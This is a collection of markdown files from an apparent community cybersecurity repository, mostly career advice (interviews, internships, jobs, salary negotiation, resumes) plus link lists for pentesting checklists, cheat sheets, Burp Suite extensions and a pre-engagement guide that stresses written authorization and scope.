- 3. Validate your Career and Goal with Mentor.
- 4. Complete the course (Free/paid) to intensify learning.
- 5. Build a Project, Resume & Cover letter.
- 6. Attend 2 mock interviews: 1 with the Community & 1 with your Mentor.
- 7. Apply & Get a Job.

Simplified steps to get a job.
If anyone would like to share their point of view or add something, you are most welcome :)

Note: When I say project, I mean building something in cybersecurity that actually solves a problem, such as an attack surface management project, a bug bounty tool, or automation for your workflow, and not a keylogger.

By Offensive Security:

- 🔴Build a Strong Resume 

  ➡Resume Now: https://resume-now.com/build-resume
  ➡Novoresume: https://novoresume.com
  ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology

- 🔵Interview Prep 
  
  ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ
  ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions
  ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf

- 🟣 YouTube Channels
  
  ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0
  ➡Resume reviews with Neal Bridges: https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p
  ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d


---

2. Find a Mentor:
  - Stage 1: Invite-based & selected mentors only.
  - Stage 2: Search for your mentor on the platform.

- 3. Validate your Career and Goal with Mentor.

**Mentor Questions**:

  If the candidate is ready:
    - May I know what role you are applying for?
    - How do you prepare for the interview?
    - Wait, I'll share something with you that will help.
    - And when you're ready with the interview questions, let me know. I'll arrange a mock interview before the actual interview so you can be prepared and confident.

  If the candidate is not ready:
    - Can you introduce yourself and tell me about your achievements?
    - May I know the course that you have completed or got certified in?

- 4. Complete the course (Free/paid) to intensify learning.
- 5. Build a Project, Resume & Cover letter.

Happy to help and take care of yourself.

---

- 6. Attend 1 Mock interview with your Mentor.
    - Review the Assigned task from last talk "Validate from Mentor".
    - Rate the candidate, give a remark & Move forward with Mock Interview:
    - Complete the Mock Interview, give a Remark & Suggestion where to apply etc.

---
Congratulations, you're ready for a job :)



=========
# Breaking into cybersecurity:

- These videos / guides will help you to smash your next interview!

Top 30 Penetration Tester Interview Questions / Answers
https://lnkd.in/eAkvQFZG

Cyber Security Interview Prep
https://lnkd.in/eky9v_hC

SOC Analyst Interview Questions (LetsDefend)
https://lnkd.in/eqFPGS-Z

GRC Entry-Level Interview Q&A (👉🏼 Gerald Auger, Ph.D.)
https://lnkd.in/eK6uti-W

Mastering the Art of the Interview (TEDX Talks / Ashley Rizzotto, M.Ed.)
https://lnkd.in/ecMGM5Tn

Tell Me About Yourself - A Good Answer To This Question
https://lnkd.in/eES-wF7Q

How to Ace a Job Interview: 10 Crucial Tips
https://lnkd.in/e29vxaH9

Cybersecurity Interview Preparation Playlist (👉 Jon Good 👈)
https://lnkd.in/ek-x4cPx

How To Be Confident In Interviews
https://lnkd.in/eGQgXbKJ

How To Crush Any Interview
https://lnkd.in/eWr2mU57

10 Best Questions to Ask an Interviewer
https://lnkd.in/efMbFn4S

How to Ace Your Job Interview (David Bombal)
https://lnkd.in/eKyqWpCU

Cybersecurity Practice Interview Questions Playlist (Josh Madakor)
https://lnkd.in/eqw-Z-tD

How to Prepare for a Cyber Security Interview (Cyberspatial)
https://lnkd.in/eTzegN6G

How to Fail a Cybersecurity Interview (Cyberspatial)
https://lnkd.in/eu_KyAf2



================================================
FILE: CyberSecurityJobs/Intership_Advice.md
================================================
## 1. Internship 
[Advice by iamthefrogy](https://github.com/iamthefrogy)
  
  Shall I go for an internship in any company after my study?
  
  Will it be helpful in my career?
  
  What kind of internship do companies provide?
  
  Is it necessary to do it from a renowned company or any company?


The answer to this question is too broad. It depends on many factors such as:
 
  • Which company is providing Internship (Product based company, security consulting company, Big4 etc.?)

  • What are their requirements for internship programs?

  • What will be the job roles and responsibilities during the internship?

  • What are the expectations from an employer?

There are very few, I would say only a handful of, companies that provide quality internships where you would learn valuable things.
Most of the money-making companies are running CEH (Certified Ethical Hacker, the official certification from EC-Council, a well-reputed cybersecurity certification authority) and related courses in the name of an internship.
For example, if my company's name is Prakash, then I will provide my own CEH certification in the name of "PCEH – Prakash Certified Ethical Hacker" and so on.

- So, I have prepared a list of 'DO' and 'DON'T' for selecting a company for your internship.


## DO

    • Understand the nature of a company (consulting, product-based, small, big, etc.).

    • Ask them about your daily responsibilities, tasks, and job routines.

    • Ask them what learning options they can provide to you during your internship.

    • Ask them what their expectations from you during the duration of the internship will be.

    • Ask more and more people around for the reviews of those companies you are evaluating for internships.

    • Identify your career interests. This could be done by self-reflection or by speaking with a career counsellor or your mentor.

    • Ask the company whether the internship is paid or unpaid. You can go for either as long as the other criteria are met.

    • Start searching for an internship at least 6 months prior.

    • If you are interested in a company and can't find any internship opportunity, you can check their website and social media. Connect with their HR via LinkedIn and ask the same.

    • Better understand and research who they are, what they do, and their strengths and weaknesses.

    • Perform at least 5 mock interviews with your career counsellor or mentor before going for an internship interview.


## DON'T

    • Don't select a company that just provides course teaching, coaching.

    • Don't select a company that does not serve any clients or serves only a handful of clients with simple projects.

    • Don't select a company that asks you to teach their students via their coaching, training programs.

    • Don't get attracted by any company's marketing & PR success.

    • Don't get attracted by their company's reputation through magazines, press, awards from random conferences or panels.

    • Don't select a company where only 4/5 people are working and all are Founders, Co-Founders, or Directors. If you do, please check their professional background. Check whether they obtained these titles without having any prior corporate experience or started their start-ups after having at least 8 years of experience in the industry.


================================================
FILE: CyberSecurityJobs/InterviewQA.md
================================================
0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=sharing

1. [83 Basics Hacking Question Answers](https://www.besanttechnologies.com/ethical-hacking-interview-questions-and-answers#) 

2. [SOC Analyst (Cybersecurity) Interview Questions and Answers - Udemy Anand Guru]()

3. [60 Cybersecurity Interview Questions](https://danielmiessler.com/study/infosec_interview_questions/)

4. [Security Engineer Interview Questions](https://github.com/tadwhitaker/Security_Engineer_Interview_Questions/blob/master/security-interview-questions.md)
5. [Security Engineer Interview Questions](https://gist.github.com/boodera/f216ac8c0ca6eb291e09b2e3cf19b3fd)
6. [Security Engineer Interview Questions, Quiz etc](https://github.com/justinltodd/security-interview-questions)
7. [Security Engineer Interview Tips](https://github.com/jigerjain/Interview_Tips)
8. [Infosec interview Questions](https://github.com/pbnj/infosec-interview-questions)
9. [Security Engineer Interview Questions and Engineering interview questions](https://github.com/paulveillard/cybersecurity-interview-questions#security)
10. [Top 50 Interview Questions & Answers | Penetration Testing - Updated 2022](https://allabouttesting.org/interview-questions-answers-penetration-testing/)
11. [Penetration Testing Interview Questions Cheat Sheet](https://allabouttesting.org/interview-questions-answers-penetration-testing/)
12. [*Penetration Testing Interview Questions Cheat Sheet by Stefano Lanaro](https://steflan-security.com/penetration-testing-interview-questions-cheat-sheet/)

13. [🧵Resources for a Successful #Cybersecurity Job Hunt🧵 by Offensive Security]


- 🔴Build a Strong Resume 

  ➡Resume Now: https://resume-now.com/build-resume
  ➡Novoresume: https://novoresume.com
  ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology

- 🔵Interview Prep 
  
  ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ
  ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions
  ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf

- 🟣 YouTube Channels
  
  ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0
  ➡Resume reviews with Neal Bridges: https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p
  ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d


================================================
FILE: CyberSecurityJobs/Jobs.md
================================================
## Table of Contents for Jobs

- [0. Weekly_Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)
- [1. Types of Company](#1-types-of-company)
- [2. Types of High Paying Jobs & responsibilities](#Types-of-High-Paying-Jobs-&-responsiblities)
- [3. IT COMPANY offer Jobs](#IT-COMPANY-offer-Jobs)
- [4. Cybersecurity jobs at Startups](##Cybersecurity-jobs-at-Startups)
- [5. Remote Jobs Search portal](#Remote-Jobs-Search-portal)
- [6. Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)
--------------------------------------------------
## **0. Weekly Cybersecurity Hiring October 2022**

If you're looking for new opportunities, do check this out. We update job openings every week.

- [ACCEIS](https://www.acceis.fr/), a French cybersecurity company, is looking for experienced [**pentesters**](https://www.acceis.fr/nos-offres-demploi/auditeur-en-cybersecurite/). The job is based in Rennes, France 🇫🇷 (hybrid remote, French citizenship required). [Other positions](https://www.acceis.fr/nos-offres-demploi/) are available too.

## **0. Weekly Cybersecurity Hiring September 2022**

- After the recent data breach, [Uber opened multiple positions for Senior Security Engineer roles at multiple locations](https://www.uber.com/in/en/careers/list/?query=security)
- Cyware has some [remote job openings for you](https://cyware.com/careers)
- Browse the jobs ReturnOnSecurity.com curates and [apply for what matches your interests.](https://returnonsecurity.pallet.com/jobs)
- Multiple job openings at ["forgepointcap"](https://jobs.forgepointcap.com/jobs)
- [Karl Sharman curated latest cybersecurity jobs](https://www.linkedin.com/feed/update/urn:li:activity:6891791435532775424/). All roles are based remotely in the US unless otherwise stated, and all salaries are base only. If you are interested, you can discuss via karl.sharman@stottandmay.com.

## **0. Weekly Cybersecurity Hiring Aug 2022**

 **Week 01-05 Hiring - August 2022**
- [Cybersecurity-NxxT hiring Security Intern](https://www.linkedin.com/posts/itsaftab_cybersecurity-internship-activity-6941036757408710657-Ld5G)
- [Q3 2022 Information security hiring](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)
- [HCL campus Hiring - NOIDA(INDIA)](https://forms.office.com/r/TUPAWePirU)
- [Jumio is hiring for 2-3 YoE security engineer](https://jobs.jobvite.com/jumio-corporation/job/oIqxkfwJ)
- Pentesters Hiring - Trivandrum/kochi(INDIA) - Send resume to rawal.p@spectral.in
- Security Engineer/Sr Security Engineer for Appsec, GRC, Cyber Defense, Data Protection & Infosec roles (experience ranging from 3 to 9 years; location: Bangalore). If you are interested in exploring any of these opportunities, please reach out to babitha.s@flipkart.com & chandana.c@flipkart.com for more details.
- Twitter has new openings for Infosec. Please go to https://twitter.com/career

## 1. Types of Company

[Credit iamthefrogy](https://github.com/iamthefrogy)

1. How many different types of companies are there?
2. Which types of companies do you choose in your initial career?

![type of company](https://user-images.githubusercontent.com/25515871/176593421-6e5c2db1-80cc-42c7-afe9-9108a3bc8850.png)

## 2. Types of High Paying Jobs & responsibilities
[Credit iamthefrogy](https://github.com/iamthefrogy)

![jobs   responsibility ](https://user-images.githubusercontent.com/25515871/176593433-716d93e0-5bd1-401d-b598-f723cf9147c9.png)

----------------------------------------------------------------------------------

## 3. IT COMPANY offer Jobs

Index | Websites
-- | --
Cisco | (https://jobs.cisco.com/jobs/SearchJobs/security?21178=%5B207928%5D&21178_format=6020&listFilterMode=1)
Deloitte | (https://jobsindia.deloitte.com/)
Sisainfosec | [Provide cybersecurity service to almost all the series startups in India](https://www.sisainfosec.com/careers/)
IBM | (https://www.ibm.com/in-en/employment/)
Oracle | (https://eeho.fa.us2.oraclecloud.com/hcmUI/CandidateExperience/en/sites/CX_1/requisitions?location=India&locationId=300000000106947&locationLevel=country)
Juniper Networks | (https://careers.juniper.net/#/)
McAfee | (https://careers.mcafee.com/location/india-jobs/731/1269750/2)
Synopsys | (https://www.synopsys.com/careers/global/south-asia/india.html)
CloudSEK | (https://cloudsek.com/openings/)
Sentinelone | [Planning to invest $50million in India](https://www.sentinelone.com/careers/)
CyberArk | (https://careers.cyberark.com/)
Cyraacs | (https://cyraacs.com/careers/)
K7 Computing Pvt. Ltd | (https://careers.k7computing.com/)
Bugcrowd | (https://www.bugcrowd.com/about/careers/?gh_jid=676938#openings)
Hackerone | (https://www.hackerone.com/careers)
Intigriti | (https://careers.intigriti.com/)
yeswehack | (https://jobs.yeswehack.com/en/)
RedTeam Hacker Academy Pvt. Ltd. | (https://redteamacademy.com/careers/)
FireCompass | (https://www.firecompass.com/careers/)
AppSecure | (https://www.linkedin.com/company/appsecuresecurity/?originalSubdomain=in)
Pentabug by AppSecure | (https://www.linkedin.com/company/pentabug/)
*Qualys - Pune opening | (https://www.qualys.com/careers/?p=search&q=research)
*Tenable - Attack surface management | (https://careers.tenable.com/search/jobs)
120+ more companies in Cybersecurity | (https://cybersecurityventures.com/cybersecurity-companies-list-hot-150/#hot-150/?view_15_per_page=150&view_15_page=1)


NOTE: For companies such as IBM, Meta, Amazon, Netflix, Alphabet, etc., we recommend applying through a referral only.
E.g., with a referral you can attempt the interview thrice in a month at Alphabet if your resume gets selected.

## 4. Cybersecurity jobs at Startups
- [Cybersecurity jobs at Startups](https://www.ycombinator.com/companies?query=cybersecurity)

## 5. Remote Jobs Search portal
- Here are 14 websites to find remote cybersecurity and tech jobs:

Index | Websites
-- | --
1. | Hired
2. | Flex Jobs
3. | Jobspresso
4. | Remote OK
5. | Just Remote
6. | JS Remotely
7. | Daily Remote
8. | Remote Leaf
9. | Remote Work
10. | Remote Leads
11. | AngelList Talent
12. | Working Nomads
13. | Product Hunt Jobs
14. | We Work Remotely

Index | Websites
-- | --
->  | (https://remoteok.com)
->  | (https://showwcase.com)
->  | (https://remotive.io)
->  | (https://remoteglobal.com)
->  | (https://devsnap.io)
->  | (https://workingnomads.co)
->  | (https://triplebyte.com)
->  | (https://nodes.co)
->  | (https://epicjobs.co)
->  | (https://remotehunt.com)
->  | (https://weworkremotely.com)
->  | (https://flexjobs.com)

## 6. [Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)


================================================
FILE: CyberSecurityJobs/Readme.md
================================================
Welcome to [RESETHACKER Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)

[![IT Job Helpdesk](https://img.shields.io/badge/-IT_Job_HelpDesk-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-IT_JobHelpDesk) 
[![Advice for cybersecurity Jobs](https://img.shields.io/badge/-Resources_for_Cybersecurity_Jobs-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Advice) 
[![Cybersecurity Domain v2 ](https://img.shields.io/badge/-Cybersecurity_Domain-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Cybersecurity_Domain) 

For **Job**👨‍💼🧑‍💼 :

- Understand domain & choose your Goal.
- Find your Mentor.
- Validate your Career and Goal with Mentor.
- Complete the course (Free/paid) to intensify learning.
- Build a Project, Resume & Cover letter.
- Attend 2 mock interviews: 1 with the Community & 1 with your Mentor.
- Apply & Get a Job.

---
![Cybersecurity Discipline and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)

---
<span id="title-IT_JobHelpDesk"></span>
## 1. IT Job Helpdesk
Index | Topics
---|---
**0** | [Resume and cover letter template](https://drive.google.com/drive/folders/1U2h882fksjfojdmcvPAeY-8TEZ1E3Oci?usp=sharing) & [Cover letter example](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CoverLetter.md)
**0** | [CyberSecurity Mentorship](https://cybermentordojo.com/)
**1** | [Watch technical mock interviews with engineers from Google, Amazon, and more](https://interviewing.io/recordings/)
**2** | [Internships Opening](https://github.com/paralax/awesome-cybersecurity-internships)
**3** | [Jobs- Search](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md)
**4** | [Roles/disciplines that best fit your abilities, experience, and interests in a cybersecurity career.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CybersecuityDiscipline.md)


<span id="title-Advice"></span>
## 2. Advice and more for cybersecurity Jobs
Index | JobsHelpDesk
---|---
**0** Cyber Career Pathways Tool | [Understand the Role & responsibility of Positions](https://niccs.cisa.gov/workforce-development/cyber-career-pathways-tool)
**0** SANS | [Popular Cybersecurity Positions in 2022](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)
**1** Iamthefrogy | [Resume Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/resume.md)
**2** Iamthefrogy | [Internship Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Intership_Advice.md)
**3** PentesterLab | [The interview for entry level cybersecurity Jobs](https://blog.pentesterlab.com/the-interview-9706357fd532)
**3** Cisco | [Job Searching & Interviewing](https://blogs.cisco.com/security/the-more-you-know-job-searching-interviewing)
**4** Jhaddix | [A hackers guide to FINDING cybersecurity jobs](https://www.jhaddix.com/post/a-hackers-guide-to-finding-cybersecurity-jobs)
**5** Placement Materials - Ankush Banik | [Aptitude solutions, Coding round and HR round](https://drive.google.com/drive/folders/1SkCOcAS0Kqvuz-MJkkjbFr1GSue6Ms6m)
**6** Salary Negotiation | [Updating More](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/SalaryNegotiation.md)
**7** [Interview Questions for cybersecurity domains](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)

<span id="title-Cybersecurity_Domain"></span>
### 3. Cybersecurity Domain v2 - Richard Bejtlich's
    
    Note: Do check out "0. Popular Cybersecurity Positions in 2022 by SANS"

![cybersecurity mindmap](https://user-images.githubusercontent.com/25515871/179057689-e33e9681-55bf-4b31-803b-a1c41d9fadfa.jpg)

Note: The content inside **RESETHACKER** is meant to help the community, and all the content belongs to the respective Authors and Team RESETHACKER.



================================================
FILE: CyberSecurityJobs/SalaryNegotiation.md
================================================
NOTE: The percentage of people who don't negotiate their salary is very high, but if everything goes really smoothly then you should negotiate it.

For salary negotiation: after hearing the offer from HR, just maintain silence for 10-15 seconds, or better still, wait for HR to say something.
Then thank them and always ask for at least 10% more than the offered salary, or an amount based on market value or your expected salary.

-> HR says no or makes excuses (don't worry)
"I was expecting between 12 Lakhs and 15 Lakhs." (give them a hint)

-> If HR still says no, then
ask for a sign-on bonus:
"Do you have a **sign-on bonus**? That would help me a lot, and it would help bridge the gap between the offered salary and my expected salary."

-> Still no, or you already have an offer
Speak clearly about what you want and tell them about the offer.

-> Still no, then
Give them time or ask for a time period.

You'll land somewhere in the middle for sure, or you may get your expected salary.


Updating More Soon .......


================================================
FILE: CyberSecurityJobs/internships.md
================================================
[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)


================================================
FILE: CyberSecurityJobs/resume.md
================================================
Index | Topics
-- | --
**1** | Resume Writing & Advice
**2** | LinkedIn – Why create a quality profile?


## 1. Resume Writing & Advice – How not to blunder?
[Credit:iamthefrogy](https://github.com/iamthefrogy)

Do you want to break into cybersecurity but don't have the experience to show on your resume?

No worries.

Here are ten great resume-building activities that will make you stand out from the competition (thanks to Naomi Buckwalter for compiling this list: https://www.linkedin.com/in/naomi-buckwalter/):
1. Volunteer with a cybersecurity conference
2. Teach a cybersecurity class
3. Mentor a student
4. Join a cybersecurity working group
5. Contribute to an open-source project
6. Build a home lab
7. Start a blog
8. Guest on a podcast
9. Lead a study group
10. Start a cybersecurity meetup or club
11. Get a basic CEH, Security+ or equivalent cert
12. AWS, Azure, GCP, etc. certifications
13. Find a vulnerability in a reputed website (bug bounty)
14. Find a zero-day and get a CVE ID

Once you do the majority of these, you will have a good number of things to showcase in your resume and your interview.

Below are some common resume blunders I have seen over the years. **Try to avoid them.**
![resumebuilder](https://user-images.githubusercontent.com/25515871/176604923-8cfa927d-d165-44f5-942f-64200c7561a1.png)

## 2. LinkedIn Advice – Why create a quality profile?
[Credit:iamthefrogy](https://github.com/iamthefrogy)

One question for you: do you want to get noticed by reputable people in your industry? Then you must create a killer LinkedIn profile. Here are the steps to create and maintain a perfect LinkedIn profile.
How to create a killer LinkedIn profile

![linkedin advice](https://user-images.githubusercontent.com/25515871/176610220-62a55217-559e-4dfa-8c86-3fdbde41077b.png)
![linkedin advice 2](https://user-images.githubusercontent.com/25515871/176605919-af655061-8a56-4d34-b165-471ad942e71b.png)


## HacktheBox/TryHackme – Why create a quality profile?
Updating soon

## HackerOne/Bugcrowd/Intigriti/YesWeHack – Why create a quality profile?
Updating soon

## Codechef/Hackerearth etc -  Why create a quality profile?
Updating soon




================================================
FILE: ISO-HelpDesk/Readme.md
================================================
# ISO HELPDESK

**1** [This article discusses "NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure Controls Framework"](https://www.complianceforge.com/faq/nist-800-53-vs-iso-27002-vs-nist-csf-vs-scf)
  > It helps you decide which cybersecurity framework is right for your organization.


================================================
FILE: LFI/Lfi.md
================================================


https://github.com/g0tmi1k/LFISuite


================================================
FILE: LFI/Lfitools.md
================================================
**LFI Tools**


Index | LFI Tools
---|---
**1** | [LFISuite](https://github.com/D35m0nd142/LFISuite)



================================================
FILE: LFI/Readme.md
================================================
**LFI (Local File Inclusion)**


Index | Content
---|---
**1** | [LFI Documentation]()
**2** | [LFI Practice labs]()
**3** | [LFI Disclosure/Reports/POC]()
**4** | [LFI Mindmap]()
**5** | [LFI Tools](/LFI/Lfitools.md)
**6** | [LFI Ebooks]()
**7** | [LFI Researchers]()
**8** | [LFI CVE]() 



================================================
FILE: Pentesting Cheatsheets/Readme.md
================================================
# Pentesting Cheatsheets

Author | Title
-- | --
**1** I-red Team | [Pentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
**2** Chris Dale | [BurpSuite Cheatsheet v1.0](/.PentestingCheatsheets/cheetsheets.md)
**3** | [Web pentesting Cheatsheet (Intermediate fav)](https://github.com/riramar/Web-Attack-Cheat-Sheet)


================================================
FILE: Pentesting Cheatsheets/cheetsheets.md
================================================
# Pentesting Cheatsheets

Author | Title
-- | --
Chris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsheets.md)


## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :
 
**Chris Dale** (@chrisadale): Users can contribute with extensions to aid in the discovery of vulnerabilities. Be aware of false positives and use your pentesting capabilities to ensure you fully explore the findings.

- Param Miner
> Allows high-performance identifying of unlinked parameters. Check for unlinked GET and Headers, and unlinked POST when applicable.

- Backslash Powered Scanner
> Will give alerts on interesting transformations of data or other interesting things. Often, it will be false positives, but it allows the penetration tester to focus on potential vulnerabilities.

- Software Vulnerability scanner
> Checks software version numbers against vulnhub.com for vulnerabilities.

- HTTP Request Smuggler
> This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks.

- Active scan++
> Allows us to find more vulnerabilities in terms of suspicious input transformation, XML input handling, host header attacks and more.

- Retire.js
> Finds outdated JavaScript and links to the relevant CVEs for your investigations.


================================================
FILE: Pentesting-BugbountyINDEX.md
================================================
[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)

Pentesting-Bugbounty:(Readme.md)
 
                 	Pentesting Sample Reports, timeline, quotation etc > PentestingReports 
                      
                      (PreEngagement.md  & Readme.md)
                
                	Pentesting for Researchers
                	BugBounty-HelpDesk > Bugbounty 
                      
                      (burpsuite.md ,Wordlists.md, Website_inputs_testing.md, Getting_Started_with_Bugbounty & Readme.md)
                
                	Cybersecurity Jobs
                	CyberSecurity Conferences

  1. Bugbounty > 
                    
                    burpsuite.md ,
                    Wordlists.md, 
                    Website_inputs_testing.md, 
                    Getting_Started_with_Bugbounty 
                    & Readme.md
  
  3. BurpSuite > 
        
                    Assets, 
                    Readme.md ,
                    protips.md              
  
  3. CyberSecurityJobs > Readme.md 
                
                   Careers
                   Intership_Advice.md
                   Readme.md
                   Remotejobs.md
                   internships.md
                   resume.md 
  
  4. PentestingReports/

                  PreEngagement.md
                  Readme.md 
                  
  5. Pentesting_for_Researchers/
                    
                  PTplatform.md
                  Readme.md (PEN TESTERS (INTERNAL AND EXTERNAL - Under Development))
                     
4. Bugbountycheetsheet > Readme.md
      bugbountyplatform.md


================================================
FILE: PentestingChecklist/Readme.md
================================================
# Checklist
Author | Checklist
-- | --
**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
**2** Software Secured |[secure-code-review-checklist](https://github.com/softwaresecured/secure-code-review-checklist)
**3** Unknown | [WAPT Checklist](https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx)
**4** Tushar Varma | [WAPT Checklist](https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6t )
**5** Hariprasaanth | [THICK CLIENT PENTESTING CHECKLIST](https://hariprasaanth.notion.site/THICK-CLIENT-PENTESTING-CHECKLIST-35c6803f26eb4c9d89ba7f5fdc901fb0)
**6** Hariprasaanth | [Web Application PENTESTING CHECKLIST](https://hariprasaanth.notion.site/hariprasaanth/WEB-APPLICATION-PENTESTING-CHECKLIST-0f02d8074b9d4af7b12b8da2d46ac998)
**7** dafthack | [Cloud pentesting](https://github.com/dafthack/CloudPentestCheatsheets)
**8** mantisSTS | [A list of web application checks sorted by functionality](https://github.com/MantisSTS/Web-Application-Hacking-List)
**9** mantisSTS | [iOS Pentesting](https://ios.pentestglobal.com/)



================================================
FILE: PentestingReports/PreEngagement.md
================================================
# Pre-engagement: 
Help yourself land your first pentesting client and prepare for the client meeting.

    ## UNDERSTAND THE TARGET:
    ## Understanding will help you tailor the test and test results
    ## WHAT IS NEEDED TO TEST?
    ### TEST TYPES
    ## SCOPE :
    ## RULES OF ENGAGEMENT
      ### CAN THINGS GO WRONG? - answer is YES.
      ### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
    ## LEGAL REQUIREMENTS FOR PENTESTING:
    ## Pentest report structure 
    ## If you are bringing in clients for the organization
      ### IF YOU ARE THE REPORT RECIPIENT
    ## HelpDesk & Reference : 
        ### Pre-engagement interaction (Recommended)
        ### Executive Reporting template
        ### Technical Reporting template
        ### A three-part video series on pen testing by Tim Medin(@timmedin)

## Understanding Pre-engagement:

    Obtained Legal Permission -> Written permission from persons in authority. 
    |
    Rules of Engagement -> Defines the scope of the penetration test.
    |
    NDA -> Signed agreement between client and provider.
    |
    Begin Penetration Testing 

![preengagements](https://user-images.githubusercontent.com/25515871/178856364-69087dd6-2458-467d-a3c2-60d2a2fcf464.png)


## What are the legal considerations for pentests?

For pentests, you need to have a contract in place before starting the engagement. 
The contract is often referred to as your get-out-of-jail-free card, but keep in mind 
that you could still be arrested for performing a pentest even if it's authorized.

Some other key legal considerations are outlined here:
    
    - *Legal Authority* - Does the client really own the systems and/or applications they want you to test?
    - *Damage Control* - Will the client assume liability for any interruptions or damage that occur as a 
    result of the pentest, or are you responsible?
    - *Hack-back* - What happens when third-party data or services are damaged as a result of the 
    pentest? Who is responsible?
    - *Licensing* - Do you need a private investigator license and certification (GPEN, CEPT, LPT and private investigator license) to perform a pentest?
    - *Privacy Issues* - Which jurisdiction will be recognized for the pentest? For example, if you are testing offices in Alabama and Virginia, 
    which state's laws will apply to the engagement?
    - *Data Ownership* - Who owns any new methods or tools that are developed as a result of the pentest engagement?
    - *Duty To Warn* - Is there a duty to warn third parties about pentest results based on the findings? 
    For example, you discover a high-severity zero-day exploit as a result of a pentest. 
    Do you report it?
    
    Scope of Work
    Professionalism

## What are the methodology/phases of pentesting?

This question could have different answers, depending on the hiring manager having real pentesting experience
or just passing a few knowledge-based certification exams.

    If you go by the penetration testing execution standard (PTES), there are seven 
    phases of pentesting, which are pre-engagement, intelligence gathering, threat 
    modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

    If you take a popular knowledge-based certification exam, the phases are 
    reconnaissance, scanning and enumeration, gaining access, maintaining access, and 
    covering tracks.

## UNDERSTAND THE TARGET:
  
    Tester: You need to work to understand the target to design a better test
    Testees: You need to understand yourself so you can steer the test and design
    Recipients: What do you want from the test? What kind of output?

      Best advice: NEVER ASSUME - Ask the dumb question
      e.g.:
        “I can guess, but I don’t like to be wrong, so can
        you describe for me what data or process if lost,
        destroyed, stolen, or leaked would cause the
        greatest damage to your organization?”

## Understanding will help you tailor the test and test results

    Why is the test being done? Compliance? Improved posture?
    What is the size/class of your network?
    What are the security goals and goal of pentesting?
    How many IPs does the network have?
    How many web pages and input forms does the application have?
    What are the *biggest risks* to the org?
    You need to identify the goals of pentesting and BUSINESS RISK of client.
 
 ![business risk](https://user-images.githubusercontent.com/25515871/177207195-029b84f2-7fdb-4b55-b36f-4c1af8514bf5.png)

## WHAT IS NEEDED TO TEST?
Organizational goals will define the test.
Sometimes the test type is the first point, sometimes it is scope. 
It all depends on the goals and background information.
   
   1. Scope
   2. Types of tests
   3. Rules of engagement

### TEST TYPES
    
    Network pentesting (Internal Network & External Network, also includes bypassing IDS & IPS)
    Assumed Breach
    Egress & C2 testing
    Red Team
    Purple Team
    Phishing
    Social Engineering
    *Web App & API testing
    *Mobile App pen testing
    Cloud penetration testing
    Wireless pen testing
    Hardware/physical pentesting
    Many others...
    
## SCOPE :

    What is in scope? – This determines time (and cost)
    What is out of scope?
      Yes, this is the same question, but ask it too and 
      you will get extra information
      Why is it out of scope?
    What is owned by someone else?
   
## RULES OF ENGAGEMENT

    What can *testers do* without additional permission?
    What should *testers not do* without additional permission?
    Usually pretty simple; simple enough to be a short list
